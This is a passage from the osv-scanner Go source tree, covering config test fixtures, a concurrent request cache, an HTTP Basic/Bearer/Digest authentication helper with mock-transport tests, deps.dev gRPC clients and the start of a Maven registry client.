toml.DecodeFile(configPath, &config) if err == nil { unknownKeys := c.Undecoded() if len(unknownKeys) > 0 { keys := make([]string, 0, len(unknownKeys)) for _, key := range unknownKeys { keys = append(keys, key.String()) } return Config{}, fmt.Errorf("unknown keys in config file: %s", strings.Join(keys, ", ")) } config.LoadPath = configPath config.warnAboutDuplicates() } return config, err } ================================================ FILE: internal/config/testdata/testdatainner/innerFolder/test.yaml ================================================ ================================================ FILE: internal/config/testdata/testdatainner/osv-scanner-load-path.toml ================================================ LoadPath = "a/b/c" ================================================ FILE: internal/config/testdata/testdatainner/osv-scanner.toml ================================================ [[IgnoredVulns]] id = "GO-2022-0968" # ignoreUntil = 2022-11-09 # reason = "" # Optional reason [[IgnoredVulns]] id = "GO-2022-1059" # ignoreUntil = 2022-11-09 # Optional exception expiry date # reason = "" # Optional reason [[PackageOverrides]] name = "lib" version = "1.0.0" ecosystem = "Go" ignore = true # effectiveUntil = 2022-11-09 # Optional exception expiry date reason = "abc" [[PackageOverrides]] name = "my-pkg" version = "1.0.0" ecosystem = "Go" ignore = true reason = "abc" license.override = ["MIT", "0BSD"] ================================================ FILE: internal/config/testdata/testdatainner/some-manifest.yaml ================================================ ================================================ FILE: internal/config/testdata/unknown-key-1.toml ================================================ [[IgnoredVulns]] id = "GHSA-jgvc-jfgh-rjvv" ignoreUntilTime = 2024-08-02 # whoops, should be "ignoreUntil" reason = "..." ================================================ FILE: internal/config/testdata/unknown-key-2.toml ================================================ [[IgnoredVulns]] id = "GHSA-jgvc-jfgh-rjvv" ignoreUntiI = 2024-08-02 # whoops, should be "ignoreUntil" reason = "..." ================================================ FILE: internal/config/testdata/unknown-key-3.toml ================================================ [[IgnoredVulns]] id = "GHSA-jgvc-jfgh-rjvv" ignoreUntil = 2024-08-02 reasoning = "..." # whoops, should be "reason" ================================================ FILE: internal/config/testdata/unknown-key-4.toml ================================================ [[PackageOverrides]] ecosystem = "npm" skip = true # whoops, should be "ignore" license.override = ["0BSD"] ================================================ FILE: internal/config/testdata/unknown-key-5.toml ================================================ [[PackageOverrides]] ecosystem = "npm" license.skip = false # whoops, should be "license.ignore" ================================================ FILE: internal/config/testdata/unknown-key-6.toml ================================================ RustVersionOverride = "1.2.3" # whoops, not supported ================================================ FILE: internal/config/testdata/unknown-key-7.toml ================================================ RustVersionOverride = "1.2.3" # whoops, not supported [[PackageOverrides]] ecosystem = "npm" skip = true # whoops, should be "ignore" ================================================ FILE: internal/datasource/cache.go ================================================ // Package datasource provides data sources for dependency resolution used by transitive scanning and guided remediation. package datasource import ( "bytes" "encoding/gob" "maps" "sync" "time" ) const cacheExpiry = 6 * time.Hour func gobMarshal(v any) ([]byte, error) { var b bytes.Buffer enc := gob.NewEncoder(&b) err := enc.Encode(v) if err != nil { return nil, err } return b.Bytes(), nil } func gobUnmarshal(b []byte, v any) error { dec := gob.NewDecoder(bytes.NewReader(b)) return dec.Decode(v) } type requestCacheCall[V any] struct { wg sync.WaitGroup val V err error } // RequestCache is a map to cache the results of expensive functions that are called concurrently. type RequestCache[K comparable, V any] struct { cache map[K]V calls map[K]*requestCacheCall[V] mu sync.Mutex } func NewRequestCache[K comparable, V any]() *RequestCache[K, V] { return &RequestCache[K, V]{ cache: make(map[K]V), calls: make(map[K]*requestCacheCall[V]), } } // Get gets the value from the cache map if it's cached, otherwise it will call fn to get the value and cache it. // fn will only ever be called once for a key, even if there are multiple simultaneous calls to Get before the first call is finished. func (rq *RequestCache[K, V]) Get(key K, fn func() (V, error)) (V, error) { // Try get it from regular cache. rq.mu.Lock() if v, ok := rq.cache[key]; ok { rq.mu.Unlock() return v, nil } // See if there is already a pending request for this key. if c, ok := rq.calls[key]; ok { rq.mu.Unlock() c.wg.Wait() return c.val, c.err } // Cache miss - create the call. c := new(requestCacheCall[V]) c.wg.Add(1) rq.calls[key] = c rq.mu.Unlock() c.val, c.err = fn() rq.mu.Lock() defer rq.mu.Unlock() // Allow other waiting goroutines to return c.wg.Done() // Store value in regular cache. if c.err == nil { rq.cache[key] = c.val } // Remove the completed call now that it's cached. if rq.calls[key] == c { delete(rq.calls, key) } return c.val, c.err } // GetMap gets a shallow clone of the stored cache map. func (rq *RequestCache[K, V]) GetMap() map[K]V { rq.mu.Lock() defer rq.mu.Unlock() return maps.Clone(rq.cache) } // SetMap loads (a shallow clone of) the provided map into the cache map. func (rq *RequestCache[K, V]) SetMap(m map[K]V) { rq.mu.Lock() defer rq.mu.Unlock() rq.cache = maps.Clone(m) } ================================================ FILE: internal/datasource/cache_test.go ================================================ package datasource_test import ( "maps" "sync" "sync/atomic" "testing" "github.com/google/osv-scanner/v2/internal/datasource" ) func TestRequestCache(t *testing.T) { // Test that RequestCache calls each function exactly once per key. t.Parallel() requestCache := datasource.NewRequestCache[int, int]() const numKeys = 20 const requestsPerKey = 50 var wg sync.WaitGroup var fnCalls [numKeys]int32 for i := range numKeys { for range requestsPerKey { wg.Go(func() { t.Helper() //nolint:errcheck requestCache.Get(i, func() (int, error) { // Count how many times this function gets called for this key, // then return the key as the value. atomic.AddInt32(&fnCalls[i], 1) return i, nil }) }) } } wg.Wait() // Make sure all the goroutines are finished for i, c := range fnCalls { if c != 1 { t.Errorf("RequestCache Get(%d) function called %d times", i, c) } } cacheMap := requestCache.GetMap() if len(cacheMap) != numKeys { t.Errorf("RequestCache GetMap length was %d, expected %d", len(cacheMap), numKeys) } for k, v := range cacheMap { if k != v { t.Errorf("RequestCache GetMap key %d has unexpected value %d", k, v) } } } func TestRequestCacheSetMap(t *testing.T) { t.Parallel() requestCache := datasource.NewRequestCache[string, string]() requestCache.SetMap(map[string]string{"foo": "foo1", "bar": "bar2"}) fn := func() (string, error) { return "CACHE MISS", nil } want := map[string]string{ "foo": "foo1", "bar": "bar2", "baz": "CACHE MISS", "FOO": "CACHE MISS", } for k, v := range want { got, err := requestCache.Get(k, fn) if err != nil { t.Errorf("Get(%v) returned an error: %v", v, err) } else if got != v { t.Errorf("Get(%v) got: %v, want %v", k, got, v) } } gotMap := requestCache.GetMap() if !maps.Equal(want, gotMap) { t.Errorf("GetMap() got %v, want %v", gotMap, want) } } ================================================ FILE: internal/datasource/http_auth.go ================================================ package datasource import ( "bytes" "context" "crypto/md5" //nolint:gosec // used in Digest access authentication algorithm "crypto/rand" "encoding/base64" "encoding/hex" "fmt" "net/http" "slices" "strings" "sync/atomic" ) type HTTPAuthMethod int const ( AuthBasic HTTPAuthMethod = iota AuthBearer AuthDigest ) // HTTPAuthentication holds the information needed for general HTTP Authentication support. // Requests made through this will automatically populate the relevant info in the Authorization headers. // This is a general implementation and should be suitable for use with any ecosystem. type HTTPAuthentication struct { SupportedMethods []HTTPAuthMethod // In order of preference, only one method will be attempted. // AlwaysAuth determines whether to always send auth headers. // If false, the server must respond with a WWW-Authenticate header which will be checked for supported methods. // Must be set to false to use Digest authentication. AlwaysAuth bool // Shared Username string // Basic & Digest, plain text. Password string // Basic & Digest, plain text. // Basic BasicAuth string // Base64-encoded username:password. Overrides Username & Password fields if set. // Bearer BearerToken string // Digest CnonceFunc func() string // Function used to generate cnonce string for Digest. OK to leave unassigned. Mostly for use in tests. lastUsed atomic.Value // The last-used authentication method - used when AlwaysAuth is false to automatically send Basic auth. } // Get makes an http GET request with the given http.Client. // The Authorization Header will automatically be populated according to the fields in the HTTPAuthentication. func (auth *HTTPAuthentication) Get(ctx context.Context, httpClient *http.Client, url string) (*http.Response, error) { req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil) if err != nil { return nil, err } // For convenience, have the nil HTTPAuthentication just make an unauthenticated request. if auth == nil { return httpClient.Do(req) } if auth.AlwaysAuth { for _, method := range auth.SupportedMethods { ok := false switch method { case AuthBasic: ok = auth.addBasic(req) case AuthBearer: ok = auth.addBearer(req) case AuthDigest: // AuthDigest needs a challenge from WWW-Authenticate, so we cannot always add the auth. } if ok { break } } return httpClient.Do(req) } // If the last request we made to this server used Basic or Bearer auth, send the header with this request if lastUsed, ok := auth.lastUsed.Load().(HTTPAuthMethod); ok { switch lastUsed { case AuthBasic: auth.addBasic(req) case AuthBearer: auth.addBearer(req) case AuthDigest: // Cannot add AuthDigest without the challenge from the initial request. } } resp, err := httpClient.Do(req) if err != nil { return nil, err } if resp.StatusCode != http.StatusUnauthorized { return resp, nil } wwwAuth := resp.Header.Values("WWW-Authenticate") ok := false var usedMethod HTTPAuthMethod req, err = http.NewRequestWithContext(ctx, http.MethodGet, url, nil) if err != nil { return nil, err } for _, method := range auth.SupportedMethods { switch method { case AuthBasic: if auth.authIndex(wwwAuth, "Basic") >= 0 { ok = auth.addBasic(req) } case AuthBearer: if auth.authIndex(wwwAuth, "Bearer") >= 0 { ok = auth.addBearer(req) } case AuthDigest: if idx := auth.authIndex(wwwAuth, "Digest"); idx >= 0 { ok = auth.addDigest(req, wwwAuth[idx]) } } if ok { usedMethod = method break } } if ok { defer resp.Body.Close() // Close the original request before we discard it. resp, err = httpClient.Do(req) } if resp.StatusCode == http.StatusOK { auth.lastUsed.Store(usedMethod) } // The original request's response will be returned if there is no matching methods. return resp, err } func (auth *HTTPAuthentication) authIndex(wwwAuth []string, authScheme string) int { return slices.IndexFunc(wwwAuth, func(s string) bool { scheme, _, _ := strings.Cut(s, " ") return scheme == authScheme }) } func (auth *HTTPAuthentication) addBasic(req *http.Request) bool { if auth.BasicAuth != "" { req.Header.Set("Authorization", "Basic "+auth.BasicAuth) return true } if auth.Username != "" && auth.Password != "" { authStr := base64.StdEncoding.EncodeToString([]byte(auth.Username + ":" + auth.Password)) req.Header.Set("Authorization", "Basic "+authStr) return true } return false } func (auth *HTTPAuthentication) addBearer(req *http.Request) bool { if auth.BearerToken != "" { req.Header.Set("Authorization", "Bearer "+auth.BearerToken) return true } return false } func (auth *HTTPAuthentication) addDigest(req *http.Request, challenge string) bool { // Mostly following the algorithm as outlined in https://en.wikipedia.org/wiki/Digest_access_authentication // And also https://datatracker.ietf.org/doc/html/rfc2617 if auth.Username == "" || auth.Password == "" { return false } params := auth.parseChallenge(challenge) realm, ok := params["realm"] if !ok { return false } nonce, ok := params["nonce"] if !ok { return false } var cnonce string ha1 := md5.Sum([]byte(auth.Username + ":" + realm + ":" + auth.Password)) //nolint:gosec switch params["algorithm"] { case "MD5-sess": cnonce = auth.cnonce() if cnonce == "" { return false } var b bytes.Buffer fmt.Fprintf(&b, "%x:%s:%s", ha1, nonce, cnonce) ha1 = md5.Sum(b.Bytes()) //nolint:gosec case "MD5": case "": default: return false } // Only support "auth" qop if qop, ok := params["qop"]; ok && !slices.Contains(strings.Split(qop, ","), "auth") { return false } uri := req.URL.Path // is this sufficient? ha2 := md5.Sum([]byte(req.Method + ":" + uri)) //nolint:gosec // hard-coding nonceCount to 1 since we don't make a request more than once nonceCount := "00000001" var b bytes.Buffer if _, ok := params["qop"]; ok { if cnonce == "" { cnonce = auth.cnonce() if cnonce == "" { return false } } fmt.Fprintf(&b, "%x:%s:%s:%s:%s:%x", ha1, nonce, nonceCount, cnonce, "auth", ha2) } else { fmt.Fprintf(&b, "%x:%s:%x", ha1, nonce, ha2) } response := md5.Sum(b.Bytes()) //nolint:gosec var sb strings.Builder fmt.Fprintf(&sb, "Digest username=\"%s\", realm=\"%s\", nonce=\"%s\", uri=\"%s\"", auth.Username, realm, nonce, uri) if _, ok := params["qop"]; ok { fmt.Fprintf(&sb, ", qop=auth, nc=%s, cnonce=\"%s\"", nonceCount, cnonce) } if alg, ok := params["algorithm"]; ok { fmt.Fprintf(&sb, ", algorithm=%s", alg) } fmt.Fprintf(&sb, ", response=\"%x\", opaque=\"%s\"", response, params["opaque"]) req.Header.Add("Authorization", sb.String()) return true } func (auth *HTTPAuthentication) parseChallenge(challenge string) map[string]string { // Parse the params out of the auth challenge header. // e.g. Digest realm="testrealm@host.com", qop="auth,auth-int" -> // {"realm": "testrealm@host.com", "qop", "auth,auth-int"} // // This isn't perfectly robust - some edge cases / weird headers may parse incorrectly. // Get rid of "Digest" prefix _, challenge, _ = strings.Cut(challenge, " ") parts := strings.Split(challenge, ",") // parts may have had a quoted comma, recombine if there's an unclosed quote. for i := 0; i < len(parts); { if strings.Count(parts[i], "\"")%2 == 1 && len(parts) > i+1 { parts[i] = parts[i] + "," + parts[i+1] parts = append(parts[:i+1], parts[i+2:]...) continue } i++ } m := make(map[string]string) for _, part := range parts { key, val, _ := strings.Cut(part, "=") key = strings.Trim(key, " ") val = strings.Trim(val, " ") // remove quotes from quoted string val = strings.Trim(val, "\"") m[key] = val } return m } func (auth *HTTPAuthentication) cnonce() string { if auth.CnonceFunc != nil { return auth.CnonceFunc() } // for a default nonce use a random 8 bytes b := make([]byte, 8) if _, err := rand.Read(b); err != nil { return "" } return hex.EncodeToString(b) } ================================================ FILE: internal/datasource/http_auth_test.go ================================================ package datasource_test import ( "net/http" "testing" "github.com/google/osv-scanner/v2/internal/datasource" ) // mockTransport is used to inspect the requests being made by HTTPAuthentications type mockTransport struct { Requests []*http.Request // All requests made to this transport UnauthedResponse *http.Response // Response sent when request does not have an 'Authorization' header. AuthedReponse *http.Response // Response to sent when request does include 'Authorization' (not checked). } func (mt *mockTransport) RoundTrip(req *http.Request) (*http.Response, error) { mt.Requests = append(mt.Requests, req) var resp *http.Response if req.Header.Get("Authorization") == "" { resp = mt.UnauthedResponse } else { resp = mt.AuthedReponse } if resp == nil { resp = &http.Response{StatusCode: http.StatusOK} } return resp, nil } func TestHTTPAuthentication(t *testing.T) { t.Parallel() tests := []struct { name string httpAuth *datasource.HTTPAuthentication requestURL string wwwAuth []string expectedAuths []string // expected Authentication headers received. expectedResponseCodes []int // expected final response codes received (length may be less than expectedAuths) }{ { name: "nil_auth", httpAuth: nil, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic"}, expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusUnauthorized}, }, { name: "default_auth", httpAuth: &datasource.HTTPAuthentication{}, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic"}, expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusUnauthorized}, }, { name: "basic_auth", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "Aladdin", Password: "open sesame", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ=="}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_from_token", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "ignored", Password: "ignored", BasicAuth: "QWxhZGRpbjpvcGVuIHNlc2FtZQ==", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ=="}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_missing_username", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "", Password: "ignored", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_missing_password", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: true, Username: "ignored", Password: "", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{""}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_not_always", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic}, AlwaysAuth: false, BasicAuth: "YTph", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic realm=\"User Visible Realm\""}, expectedAuths: []string{"", "Basic YTph"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "bearer_auth", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBearer}, AlwaysAuth: true, BearerToken: "abcdefgh", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Bearer abcdefgh"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "bearer_auth_not_always", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBearer}, AlwaysAuth: false, BearerToken: "abcdefgh", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Bearer"}, expectedAuths: []string{"", "Bearer abcdefgh"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "always_auth_priority", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBasic, datasource.AuthBearer}, AlwaysAuth: true, BasicAuth: "UseThisOne", BearerToken: "NotThisOne", }, requestURL: "http://127.0.0.1/", expectedAuths: []string{"Basic UseThisOne"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "not_always_auth_priority", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthBearer, datasource.AuthDigest, datasource.AuthBasic}, AlwaysAuth: false, Username: "DoNotUse", Password: "ThisField", BearerToken: "PleaseUseThis", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic", "Bearer"}, expectedAuths: []string{"", "Bearer PleaseUseThis"}, expectedResponseCodes: []int{http.StatusOK}, }, { name: "digest_auth", // Example from https://en.wikipedia.org/wiki/Digest_access_authentication#Example_with_explanation httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest}, AlwaysAuth: false, Username: "Mufasa", Password: "Circle Of Life", CnonceFunc: func() string { return "0a4f113b" }, }, requestURL: "https://127.0.0.1/dir/index.html", wwwAuth: []string{ "Digest realm=\"testrealm@host.com\", " + "qop=\"auth,auth-int\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedAuths: []string{ "", // The order of these fields shouldn't actually matter "Digest username=\"Mufasa\", " + "realm=\"testrealm@host.com\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "uri=\"/dir/index.html\", " + "qop=auth, " + "nc=00000001, " + "cnonce=\"0a4f113b\", " + "response=\"6629fae49393a05397450978507c4ef1\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedResponseCodes: []int{http.StatusOK}, }, { name: "digest_auth_rfc2069", // old spec, without qop header httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest}, AlwaysAuth: false, Username: "Mufasa", Password: "Circle Of Life", }, requestURL: "https://127.0.0.1/dir/index.html", wwwAuth: []string{ "Digest realm=\"testrealm@host.com\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedAuths: []string{ "", // The order of these fields shouldn't actually matter "Digest username=\"Mufasa\", " + "realm=\"testrealm@host.com\", " + "nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", " + "uri=\"/dir/index.html\", " + "response=\"670fd8c2df070c60b045671b8b24ff02\", " + "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"", }, expectedResponseCodes: []int{http.StatusOK}, }, { name: "digest_auth_mvn", // From what mvn sends. httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest}, AlwaysAuth: false, Username: "my-username", Password: "cool-password", CnonceFunc: func() string { return "f7ef2d457dabcd54" }, }, requestURL: "https://127.0.0.1:41565/commons-io/commons-io/1.0/commons-io-1.0.pom", wwwAuth: []string{ "Digest realm=\"test@osv.dev\"," + "qop=\"auth\"," + "nonce=\"deadbeef\"," + "opaque=\"aaaa\"," + "algorithm=\"MD5-sess\"," + "domain=\"/test\"", }, expectedAuths: []string{ "", // The order of these fields shouldn't actually matter "Digest username=\"my-username\", " + "realm=\"test@osv.dev\", " + "nonce=\"deadbeef\", " + "uri=\"/commons-io/commons-io/1.0/commons-io-1.0.pom\", " + "qop=auth, " + "nc=00000001, " + "cnonce=\"f7ef2d457dabcd54\", " + "algorithm=MD5-sess, " + "response=\"15a35e7018a0fc7db05d31185e0d2c9e\", " + "opaque=\"aaaa\"", }, expectedResponseCodes: []int{http.StatusOK}, }, { name: "basic_auth_reuse_on_subsequent", httpAuth: &datasource.HTTPAuthentication{ SupportedMethods: []datasource.HTTPAuthMethod{datasource.AuthDigest, datasource.AuthBasic}, AlwaysAuth: false, Username: "user", Password: "pass", }, requestURL: "http://127.0.0.1/", wwwAuth: []string{"Basic realm=\"Realm\""}, expectedAuths: []string{"", "Basic dXNlcjpwYXNz", "Basic dXNlcjpwYXNz"}, expectedResponseCodes: []int{http.StatusOK, http.StatusOK}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() mt := &mockTransport{} if len(tt.wwwAuth) > 0 { mt.UnauthedResponse = &http.Response{ StatusCode: http.StatusUnauthorized, Header: make(http.Header), } for _, v := range tt.wwwAuth { mt.UnauthedResponse.Header.Add("WWW-Authenticate", v) } } httpClient := &http.Client{Transport: mt} for _, want := range tt.expectedResponseCodes { resp, err := tt.httpAuth.Get(t.Context(), httpClient, tt.requestURL) if err != nil { t.Fatalf("error making request: %v", err) } defer resp.Body.Close() if resp.StatusCode != want { t.Errorf("authorization response status code got = %d, want %d", resp.StatusCode, want) } } if len(mt.Requests) != len(tt.expectedAuths) { t.Fatalf("unexpected number of requests got = %d, want %d", len(mt.Requests), len(tt.expectedAuths)) } for i, want := range tt.expectedAuths { got := mt.Requests[i].Header.Get("Authorization") if got != want { t.Errorf("authorization header got = \"%s\", want \"%s\"", got, want) } } }) } } ================================================ FILE: internal/datasource/insights.go ================================================ package datasource import ( "context" "crypto/x509" "fmt" "sync" "time" pb "deps.dev/api/v3" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) // CachedInsightsClient is a wrapper for InsightsClient that caches requests. type CachedInsightsClient struct { pb.InsightsClient // cache fields mu sync.Mutex cacheTimestamp *time.Time packageCache *RequestCache[packageKey, *pb.Package] versionCache *RequestCache[versionKey, *pb.Version] requirementsCache *RequestCache[versionKey, *pb.Requirements] } // Comparable types to use as map keys for cache. type packageKey struct { System pb.System Name string } func makePackageKey(k *pb.PackageKey) packageKey { return packageKey{ System: k.GetSystem(), Name: k.GetName(), } } type versionKey struct { System pb.System Name string Version string } func makeVersionKey(k *pb.VersionKey) versionKey { return versionKey{ System: k.GetSystem(), Name: k.GetName(), Version: k.GetVersion(), } } func NewCachedInsightsClient(addr string, userAgent string) (*CachedInsightsClient, error) { certPool, err := x509.SystemCertPool() if err != nil { return nil, fmt.Errorf("getting system cert pool: %w", err) } creds := credentials.NewClientTLSFromCert(certPool, "") dialOpts := []grpc.DialOption{grpc.WithTransportCredentials(creds)} if userAgent != "" { dialOpts = append(dialOpts, grpc.WithUserAgent(userAgent)) } conn, err := grpc.NewClient(addr, dialOpts...) if err != nil { return nil, fmt.Errorf("dialling %q: %w", addr, err) } return &CachedInsightsClient{ InsightsClient: pb.NewInsightsClient(conn), packageCache: NewRequestCache[packageKey, *pb.Package](), versionCache: NewRequestCache[versionKey, *pb.Version](), requirementsCache: NewRequestCache[versionKey, *pb.Requirements](), }, nil } func (c *CachedInsightsClient) GetPackage(ctx context.Context, in *pb.GetPackageRequest, opts ...grpc.CallOption) (*pb.Package, error) { return c.packageCache.Get(makePackageKey(in.GetPackageKey()), func() (*pb.Package, error) { return c.InsightsClient.GetPackage(ctx, in, opts...) }) } func (c *CachedInsightsClient) GetVersion(ctx context.Context, in *pb.GetVersionRequest, opts ...grpc.CallOption) (*pb.Version, error) { return c.versionCache.Get(makeVersionKey(in.GetVersionKey()), func() (*pb.Version, error) { return c.InsightsClient.GetVersion(ctx, in, opts...) }) } func (c *CachedInsightsClient) GetRequirements(ctx context.Context, in *pb.GetRequirementsRequest, opts ...grpc.CallOption) (*pb.Requirements, error) { return c.requirementsCache.Get(makeVersionKey(in.GetVersionKey()), func() (*pb.Requirements, error) { return c.InsightsClient.GetRequirements(ctx, in, opts...) }) } ================================================ FILE: internal/datasource/insights_cache.go ================================================ package datasource import ( "time" pb "deps.dev/api/v3" "google.golang.org/protobuf/proto" ) type depsdevAPICache struct { Timestamp *time.Time PackageCache map[packageKey][]byte VersionCache map[versionKey][]byte RequirementsCache map[versionKey][]byte } func protoMarshalCache[K comparable, V proto.Message](protoMap map[K]V) (map[K][]byte, error) { byteMap := make(map[K][]byte) for k, v := range protoMap { b, err := proto.Marshal(v) if err != nil { return nil, err } byteMap[k] = b } return byteMap, nil } func protoUnmarshalCache[K comparable, V any, PV interface { proto.Message *V }](byteMap map[K][]byte, protoMap *map[K]PV) error { *protoMap = make(map[K]PV) for k, b := range byteMap { v := PV(new(V)) if err := proto.Unmarshal(b, v); err != nil { return err } (*protoMap)[k] = v } return nil } func (c *CachedInsightsClient) GobEncode() ([]byte, error) { var cache depsdevAPICache c.mu.Lock() defer c.mu.Unlock() if c.cacheTimestamp == nil { now := time.Now().UTC() c.cacheTimestamp = &now } cache.Timestamp = c.cacheTimestamp var err error cache.PackageCache, err = protoMarshalCache(c.packageCache.GetMap()) if err != nil { return nil, err } cache.VersionCache, err = protoMarshalCache(c.versionCache.GetMap()) if err != nil { return nil, err } cache.RequirementsCache, err = protoMarshalCache(c.requirementsCache.GetMap()) if err != nil { return nil, err } return gobMarshal(cache) } func (c *CachedInsightsClient) GobDecode(b []byte) error { var cache depsdevAPICache if err := gobUnmarshal(b, &cache); err != nil { return err } if cache.Timestamp != nil && time.Since(*cache.Timestamp) >= cacheExpiry { // Cache expired return nil } c.mu.Lock() defer c.mu.Unlock() c.cacheTimestamp = cache.Timestamp var pkgMap map[packageKey]*pb.Package if err := protoUnmarshalCache(cache.PackageCache, &pkgMap); err != nil { return err } var verMap map[versionKey]*pb.Version if err := protoUnmarshalCache(cache.VersionCache, &verMap); err != nil { return err } var reqMap map[versionKey]*pb.Requirements if err := protoUnmarshalCache(cache.RequirementsCache, &reqMap); err != nil { return err } c.packageCache.SetMap(pkgMap) c.versionCache.SetMap(verMap) c.requirementsCache.SetMap(reqMap) return nil } ================================================ FILE: internal/datasource/insightsalpha.go ================================================ package datasource import ( "crypto/x509" "fmt" pb "deps.dev/api/v3alpha" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) // NewInsightsAlphaClient creates a deps.dev v3alpha InsightsClient with a custom address and userAgent. func NewInsightsAlphaClient(addr string, userAgent string) (pb.InsightsClient, error) { certPool, err := x509.SystemCertPool() if err != nil { return nil, fmt.Errorf("getting system cert pool: %w", err) } creds := credentials.NewClientTLSFromCert(certPool, "") dialOpts := []grpc.DialOption{grpc.WithTransportCredentials(creds)} if userAgent != "" { dialOpts = append(dialOpts, grpc.WithUserAgent(userAgent)) } conn, err := grpc.NewClient(addr, dialOpts...) if err != nil { return nil, fmt.Errorf("dialling %q: %w", addr, err) } return pb.NewInsightsClient(conn), nil } ================================================ FILE: internal/datasource/maven_registry.go ================================================ package datasource import ( "bytes" "context" "encoding/xml" "errors" "fmt" "io" "net/http" "net/url" "slices" "strings" "sync" "time" "deps.dev/util/maven" "deps.dev/util/semver" "golang.org/x/net/html/charset" ) const MavenCentral = "https://repo.maven.apache.org/maven2" var errAPIFailed = errors.New("API query failed") type MavenRegistryAPIClient struct { defaultRegistry MavenRegistry // The default registry that we are making requests registries []MavenRegistry // Additional registries specified to fetch projects registryAuths map[string]*HTTPAuthentication // Authentication for the registries keyed by registry ID. From settings.xml // Cache fields mu *sync.Mutex cacheTimestamp *time.Time // If set, this means we loaded from a cache responses *RequestCache[string, response] } type response struct { StatusCode int Body []byte } type MavenRegistry struct { URL string Parsed *url.URL // Information from pom.xml ID string ReleasesEnabled bool SnapshotsEnabled bool } func NewMavenRegistryAPIClient(registry MavenRegistry) (*MavenRegistryAPIClient, error) { if registry.URL == "" { registry.URL = MavenCentral registry.ID = "central" } u, err := url.Parse(registry.URL) if err != nil { return nil, fmt.Errorf("invalid Maven registry %s: %w", registry.URL, err) } registry.Parsed = u // TODO: allow for manual specification of settings files globalSettings := ParseMavenSettings(globalMavenSettingsFile()) userSettings := ParseMavenSettings(userMavenSettingsFile()) return &MavenRegistryAPIClient{ // We assume only downloading releases is allowed on the default registry. defaultRegistry: registry, mu: &sync.Mutex{}, responses: NewRequestCache[string, response](), registryAuths: MakeMavenAuth(globalSettings, userSettings), }, nil } // WithoutRegistries makes MavenRegistryAPIClient including its cache but not registries. func (m *MavenRegistryAPIClient) WithoutRegistries() *MavenRegistryAPIClient { return &MavenRegistryAPIClient{ defaultRegistry: m.defaultRegistry, mu: m.mu, cacheTimestamp: m.cacheTimestamp, responses: m.responses, } } // AddRegistry adds the given registry to the list of registries if it has not been added. func (m *MavenRegistryAPIClient) AddRegistry(registry MavenRegistry) error { for _, reg := range m.registries { if reg.ID == registry.ID { return nil } } u, err := url.Parse(registry.URL) if err != nil { return err } registry.Parsed = u m.registries = append(m.registries, registry) return nil } func (m *MavenRegistryAPIClient) GetRegistries() (registries []MavenRegistry) { return m.registries } // GetProject fetches a pom.xml specified by groupID, artifactID and version and parses it to maven.Project. // Each registry in the list is tried until we find the project. // For a snapshot version, version level metadata is used to find the extact version string. // More about Maven Repository Metadata Model: https://maven.apache.org/ref/3.9.9/maven-repository-metadata/ // More about Maven Metadata: https://maven.apache.org/repositories/metadata.html func (m *MavenRegistryAPIClient) GetProject(ctx context.Context, groupID, artifactID, version string) (maven.Project, error) { if !strings.HasSuffix(version, "-SNAPSHOT") { for _, registry := range append(m.registries, m.defaultRegistry) { if 